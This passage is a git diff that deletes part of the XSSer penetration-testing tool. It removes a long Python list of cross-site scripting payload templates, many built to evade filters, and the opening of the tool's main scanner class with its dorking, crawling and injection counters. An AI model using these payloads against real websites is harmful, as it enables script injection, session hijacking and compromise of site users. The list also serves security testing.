-        { 'payload':'''<iframe onload iframe onload="javascript:javascript:PAYLOAD"></iframe onload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onload body onload="javascript:javascript:PAYLOAD"></body onload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onmouseover html onmouseover="javascript:javascript:PAYLOAD"></html onmouseover>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<object onbeforeload object onbeforeload="javascript:javascript:PAYLOAD"></object onbeforeload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onbeforeunload body onbeforeunload="javascript:javascript:PAYLOAD"></body onbeforeunload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onfocus body onfocus="javascript:javascript:PAYLOAD"></body onfocus>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onkeydown body onkeydown="javascript:javascript:PAYLOAD"></body onkeydown>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:javascript:PAYLOAD"></iframe onbeforeload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe src iframe src="javascript:javascript:PAYLOAD"></iframe src>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg onload svg onload="javascript:javascript:PAYLOAD"></svg onload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onmousemove html onmousemove="javascript:javascript:PAYLOAD"></html onmousemove>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onblur body onblur="javascript:javascript:PAYLOAD"></body onblur>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''--><!-- ---> <img src=xxx:x onerror=javascript:PAYLOAD> -->''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''"`'><script>-javascript:PAYLOAD</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onscroll=javascript:PAYLOAD><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<form id=test onforminput=javascript:PAYLOAD><input></form><button form=test onformchange=javascript:PAYLOAD>X''',
-	      'browser':"""[Not Info]"""},
-        { 'payload':'''<video><source onerror="javascript:javascript:PAYLOAD">''',
-		  'browser':"""[HTML5 Injection]"""},
-        { 'payload':'''<form><button formaction="javascript:javascript:PAYLOAD">X''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body oninput=javascript:PAYLOAD><input autofocus>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<math href="javascript:javascript:PAYLOAD">X</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:PAYLOAD">X</maction> </math>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<frameset onload=javascript:PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<table background="javascript:javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<!--<img src="--><img src=x onerror=javascript:PAYLOAD//">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<comment><img src="</comment><img src=x onerror=javascript:PAYLOAD)//">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<![><img src="]><img src=x onerror=javascript:PAYLOAD//">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<style><img src="</style><img src=x onerror=javascript:PAYLOAD//">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<li style=list-style:url() onerror=javascript:PAYLOAD> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:PAYLOAD></div>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,javascript:PAYLOAD//#">X</a></body>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>javascript:PAYLOAD</SCRIPT>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:PAYLOAD"></OBJECT>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<b <script>PAYLOAD</script>0''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div id="div1"><input value="``onmouseover=javascript:PAYLOAD"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<x '="foo"><x foo='><img src=x onerror=javascript:PAYLOAD//'>''',
-	      'browser':"""[Not Info]"""},
-        { 'payload':'''<embed src="javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<image src="javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<img src="javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script src="javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=javascript:PAYLOAD>x''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<? foo="><script>javascript:PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<! foo="><script>javascript:PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''</ foo="><script>javascript:PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<? foo="><x foo='?><script>javascript:PAYLOAD</script>'>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<! foo="[[[Inception]]"><x foo="]foo><script>javascript:PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<% foo><x foo="%><script>javascript:PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div id=d><x xmlns="><iframe onload=javascript:PAYLOAD"></div> <script>d.innerHTML=d.innerHTML</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<img[a][b][c]src[d]=x[e]onerror=[f]"PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:PAYLOAD>XXX</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<img src="x` `<script>javascript:PAYLOAD</script>"` `>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<img src onerror /" '"= alt=javascript:PAYLOAD//">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<title onpropertychange=javascript:PAYLOAD></title><title title=>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:PAYLOAD></a>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<!--[if]><script>javascript:PAYLOAD</script -->''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<!--[if<img src=x onerror=javascript:PAYLOAD//]> -->''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a style="-o-link:'javascript:javascript:PAYLOAD';-o-link-source:current">X''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<style>p[foo=bar{}*{-o-link:'javascript:javascript:PAYLOAD'}{}*{-o-link-source:current}]{color:red};</style>''',
-    	  'browser':"""[Not Info]"""},
-        { 'payload':'''<link rel=stylesheet href=data:,*%7bx:expression(javascript:PAYLOAD)%7d''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<style>@import "data:,*%7bx:expression(javascript:PAYLOAD)%7D";</style>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:PAYLOAD;">X</a></a><a href="javascript:javascript:PAYLOAD">X</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div style="list-style:url(http://foo.f)\20url(javascript:javascript:PAYLOAD);">X''',
-    	  'browser':"""[Not Info]"""},
-        { 'payload':'''<script>({set/**/$($){_/**/setter=$,_=javascript:PAYLOAD}}).$=eval</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script>({0:#0=eval/#0#/#0#(javascript:PAYLOAD)})</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:PAYLOAD}),x</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:PAYLOAD')()</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''X<x style=`behavior:url(#default#time2)` onbegin=`javascript:PAYLOAD` >''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:PAYLOAD&gt;`>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:PAYLOAD&gt;>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:PAYLOAD strokecolor=white strokeweight=1000px from=0 to=1000 /></a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:PAYLOAD">X</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<event-source src="%(event)s" onload="javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a href="javascript:javascript:PAYLOAD"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:PAYLOAD&gt;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:PAYLOAD&gt;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG SRC="javascript:javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG SRC=javascript:javascript:PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG SRC=`javascript:javascript:PAYLOAD`>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<FRAMESET><FRAME SRC="javascript:javascript:PAYLOAD;"></FRAMESET>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<BODY ONLOAD=javascript:javascript:PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG SRC="jav    ascript:javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG DYNSRC="javascript:javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG LOWSRC="javascript:javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<BGSOUND SRC="javascript:javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<BR SIZE="&{javascript:PAYLOAD}">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE>li {list-style-image: url("javascript:javascript:PAYLOAD");}</STYLE><UL><LI>X''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IFRAME SRC="javascript:javascript:PAYLOAD;"></IFRAME>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<TABLE BACKGROUND="javascript:javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<TABLE><TD BACKGROUND="javascript:javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<DIV STYLE="background-image: url(javascript:javascript:PAYLOAD)">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<DIV STYLE="width:expression(javascript:PAYLOAD);">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG STYLE="x:expr/*X*/ession(javascript:PAYLOAD)">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<XSS STYLE="x:expression(javascript:PAYLOAD)">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE TYPE="text/javascript">javascript:PAYLOAD;</STYLE>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE>.XSS{background-image:url("javascript:javascript:PAYLOAD");}</STYLE><A CLASS=XSS></A>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:javascript:PAYLOAD")}</STYLE>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<BASE HREF="javascript:javascript:PAYLOAD;//">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':"""<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:PAYLOAD></OBJECT>""",
-		  'browser':"""[O9.02]"""},
-		{ 'payload':'''<HTML xmlns:x><?import namespace="x" implementation="%(htc)s"><x:x>XSS</x:x></HTML>""","XML namespace."),("""<XML ID="x"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:PAYLOAD"&gt;</B></I></XML><SPAN DATASRC="#x" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:PAYLOAD&lt;/SCRIPT&gt;"></BODY></HTML>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<form id="test" /><button form="test" formaction="javascript:javascript:PAYLOAD">X''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onscroll=javascript:PAYLOAD><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:PAYLOAD">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:PAYLOAD;');}</STYLE>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:PAYLOAD&&;&&<&&/script&&>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<SCRIPT onreadystatechange=javascript:javascript:PAYLOAD;></SCRIPT>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:PAYLOAD;</html:script></html:html>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<embed code=javascript:javascript:PAYLOAD></embed>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<frameset onload=javascript:javascript:PAYLOAD></frameset>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<object onerror=javascript:javascript:PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:PAYLOAD;">]]</C><X></xml>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG SRC=&{javascript:PAYLOAD;};>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a href="jav&#65ascript:javascript:PAYLOAD">X</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a href="jav&#97ascript:javascript:PAYLOAD">X</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:PAYLOAD&amp;gt;>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<IMG SRC=JaVaScRiPt:PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a onmouseover="PAYLOAD">X</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a onmouseover=PAYLOAD>X</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:PAYLOAD;">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE>@im\port'\ja\vasc\ript:PAYLOAD';</STYLE>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE>.X{background-image:url("javascript:PAYLOAD");}</STYLE><A CLASS=X></A>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:PAYLOAD")}</STYLE>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<XSS STYLE="xss:expression(PAYLOAD)">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<BASE HREF="javascript:PAYLOAD;//">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<img src=`%00`&NewLine; onerror=PAYLOAD&NewLine;''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe/src="data:text/html,<svg &#111;&#110;load=PAYLOAD>">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; PAYLOAD" http-equiv="refresh"/>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:PAYLOAD&NewLine;>X</a>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<marquee onstart='javascript:PAYLOAD&#x28;1&#x29;'>^__^''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe/%00/ src=javaSCRIPT&colon;PAYLOAD''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<%<!--'%><script>PAYLOAD;</script -->''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script src="data:text/javascript,PAYLOAD"></script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe/onreadystatechange=PAYLOAD''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg/onload=PAYLOAD''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<input type="text" value=`` <div/onmouseover='PAYLOAD'>X</div>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''http://www.<script>PAYLOAD</script .com''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg><script ?>PAYLOAD''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<img src=`xx:xx`onerror=PAYLOAD''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;PAYLOAD"/>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script>+-+-1-+-+PAYLOAD</script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body/onload=&lt;!--&gt;&#10PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script itworksinallbrowsers>/*<script* */PAYLOAD</script''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<img src ?itworksonchrome?\/onerror = PAYLOAD''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg><script onlypossibleinopera:-)> PAYLOAD''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script x> PAYLOAD </script 1=2''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div/onmouseover='PAYLOAD'> style="x:">''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<--`<img/src=` onerror=PAYLOAD> --!>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="PAYLOAD">x</button>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<form><button formaction=javascript&colon;PAYLOAD>X''',
-		  'browser':"""[Not Info]"""}
-]
diff --git a/xsser/core/main.py b/xsser/core/main.py
deleted file mode 100644
index 99274a5..0000000
--- a/xsser/core/main.py
+++ /dev/null
@@ -1,2700 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-"
-# vim: set expandtab tabstop=4 shiftwidth=4:
-"""
-$Id$
-
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
-
-xsser is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 3 of the License.
-
-xsser is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with xsser; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-import os, re, sys, datetime, hashlib, time, urllib, cgi, traceback, webbrowser, random
-from random import randint
-import core.fuzzing
-import core.fuzzing.vectors
-import core.fuzzing.DCP
-import core.fuzzing.DOM
-import core.fuzzing.HTTPsr
-import core.fuzzing.heuristic
-from collections import defaultdict
-from itertools import islice, chain
-from urlparse import parse_qs, urlparse
-from core.curlcontrol import Curl
-from core.encdec import EncoderDecoder
-from core.options import XSSerOptions
-from core.dork import Dorker
-from core.crawler import Crawler
-from core.imagexss import ImageInjections
-from core.flashxss import FlashInjections
-from core.post.xml_exporter import xml_reporting
-from core.tokenhub import HubThread
-from core.reporter import XSSerReporter
-from core.threadpool import ThreadPool, NoResultsPending
-from core.update import Updater
-
-# set to emit debug messages about errors (0 = off).
-DEBUG = 0
-
-class xsser(EncoderDecoder, XSSerReporter):
-    """
-    XSSer application class
-    """
-    def __init__(self, mothership=None):
-        self._reporter = None
-        self._reporters = []
-        self._landing = False
-        self._ongoing_requests = 0
-        self._oldcurl = []
-        self._gtkdir = None
-        self._webbrowser = webbrowser
-        self.crawled_urls = []
-        self.checked_urls = []
-        self.successfull_urls = []
-        self.urlmalformed = False
-        self.search_engines = [] # available dorking search engines
-        #self.search_engines.append('duck')
-        self.search_engines.append('bing')
-        #self.search_engines.append('google')
-        self.search_engines.append('yahoo')
-        #self.search_engines.append('yandex')
-        self.user_template = None # wizard user template
-        self.user_template_conntype = "GET" # GET by default
-
-        if not mothership:
-            # no mothership so *this* is the mothership
-            # start the communications hub and rock on!
-            self.hub = None
-            self.pool = ThreadPool(0)
-            self.mothership = None
-            self.final_attacks = {}
-        else:
-            self.hub = None
-            self.mothership = mothership
-            self.mothership.add_reporter(self)
-            self.pool = ThreadPool(0)
-            self.final_attacks = self.mothership.final_attacks
-            #self.pool = None
-
-        # initialize the url encoder/decoder
-        EncoderDecoder.__init__(self)
-
-        # your unique real opponent
-        self.time = datetime.datetime.now()
-
-        # this payload comes with vector already..
-        self.DEFAULT_XSS_PAYLOAD = 'XSS'
-
-        # to be or not to be...
-        self.hash_found = []
-        self.hash_notfound = []
-
-        # other hashes
-        self.hashed_payload = []
-        self.url_orig_hash = []
-
-        # some counters for checker systems
-        self.errors_isalive = 0
-        self.next_isalive = False
-        self.flag_isalive_num = 0
-        
-        # some controls about targets
-        self.urlspoll = []
-
-        # some statistics counters for connections
-        self.success_connection = 0
-        self.not_connection = 0
-        self.forwarded_connection = 0
-        self.other_connection = 0
-
-	# some statistics counters for payloads
-        self.xsr_injection = 0
-        self.xsa_injection = 0
-        self.coo_injection = 0
-        self.manual_injection = 0
-        self.auto_injection = 0
-        self.dcp_injection = 0
-        self.dom_injection = 0
-        self.httpsr_injection = 0
-        self.check_positives = 0
-        
-        # some statistics counters for injections found
-        self.xsr_found = 0
-        self.xsa_found = 0
-        self.coo_found = 0
-        self.manual_found = 0
-        self.auto_found = 0
-        self.dcp_found = 0
-        self.dom_found = 0
-        self.httpsr_found = 0
-        self.false_positives = 0
-
-	# some statistics counters for heuristic parameters
-        self.heuris_backslash_found = 0
-        self.heuris_une_backslash_found = 0
-        self.heuris_dec_backslash_found = 0
-        self.heuris_backslash_notfound = 0
-        self.heuris_slash_found = 0
-        self.heuris_une_slash_found = 0
-        self.heuris_dec_slash_found = 0
-        self.heuris_slash_notfound = 0
-        self.heuris_mayor_found = 0
-        self.heuris_une_mayor_found = 0
-        self.heuris_dec_mayor_found = 0
-        self.heuris_mayor_notfound = 0
-        self.heuris_minor_found = 0
-        self.heuris_une_minor_found = 0
-        self.heuris_dec_minor_found = 0
-        self.heuris_minor_notfound = 0
-        self.heuris_semicolon_found = 0
-        self.heuris_une_semicolon_found = 0
-        self.heuris_dec_semicolon_found = 0
-        self.heuris_semicolon_notfound = 0
-        self.heuris_colon_found = 0
-        self.heuris_une_colon_found = 0
-        self.heuris_dec_colon_found = 0
-        self.heuris_colon_notfound = 0
-        self.heuris_doublecolon_found = 0
-        self.heuris_une_doublecolon_found = 0
-        self.heuris_dec_doublecolon_found = 0
-        self.heuris_doublecolon_notfound = 0
-        self.heuris_equal_found = 0
-        self.heuris_une_equal_found = 0
-        self.heuris_dec_equal_found = 0
-        self.heuris_equal_notfound = 0
-
-        # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
-        self.verbose = 2
-        self.options = None
-
-    def __del__(self):
-        if not self._landing:
-            self.land()
-
-    def get_gtk_directory(self):
-        if self._gtkdir:
-            return self._gtkdir
-        local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
-                                  'gtk')
-        if os.path.exists(local_path):
-            self._gtkdir = local_path
-            return self._gtkdir
-        elif os.path.exists('/usr/share/xsser/gtk'):
-            self._gtkdir = '/usr/share/xsser/gtk'
-            return self._gtkdir
-
-    def set_webbrowser(self, browser):
-        self._webbrowser = browser
-
-    def set_reporter(self, reporter):
-        self._reporter = reporter
-
-    def add_reporter(self, reporter):
-        self._reporters.append(reporter)
-
-    def remove_reporter(self, reporter):
-        if reporter in self._reporters:
-            self._reporters.remove(reporter)
-
-    def generate_hash(self, attack_type='default'):
-        """
-        Generate a new hash for a type of attack.
-        """
-        return hashlib.md5(str(datetime.datetime.now()) + attack_type).hexdigest()
-
-    def generate_numeric_hash(self): # 32 length as md5
-        """
-        Generate a new hash for numeric only XSS
-        """
-        newhash = ''.join(random.choice('0123456789') for i in range(32)) 
-        return newhash
-
-    def report(self, msg, level='info'):
-        """
-        Report some error from the application.
-
-        levels: debug, info, warning, error
-        """
-        if self.verbose == 2:
-            prefix = ""
-            if level != 'info':
-                prefix = "["+level+"] "
-            print msg
-        elif self.verbose:
-            if level == 'error':
-                sys.stdout.write("*")
-            else:
-                sys.stdout.write(".")
-        for reporter in self._reporters:
-            reporter.post(msg)
-        if self._reporter:
-            from twisted.internet import reactor
-            reactor.callFromThread(self._reporter.post, msg)
-
-    def set_options(self, options):
-        """
-        Set xsser options
-        """
-        self.options = options
-        self._opt_request()
-
-    def _opt_request(self):
-        """
-        Pass on some properties to Curl
-        """
-        options = self.options
-        for opt in ['cookie', 'agent', 'referer',\
-			'headers', 'atype', 'acred', 'acert',
-			'proxy', 'ignoreproxy', 'timeout', 
-                        'delay', 'tcp_nodelay', 'retries', 
-                        'xforw', 'xclient', 'threads', 
-                        'dropcookie', 'followred', 'fli',
-                        'nohead', 'isalive', 'alt', 'altm',
-                        'ald'
-			]:
-            if hasattr(options, opt) and getattr(options, opt):
-                setattr(Curl, opt, getattr(options, opt))
-
-    # attack functions
-    def get_payloads(self):
-        """
-        Process payload options and make up the payload list for the attack.
-        """
-        options = self.options
-	# payloading sources
-        payloads_fuzz = core.fuzzing.vectors.vectors
-        payloads_dcp = core.fuzzing.DCP.DCPvectors
-        payloads_dom = core.fuzzing.DOM.DOMvectors
-        payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
-        manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
-        # sustitute payload for hash to check false positives
-        self.hashed_payload = self.generate_hash('url')
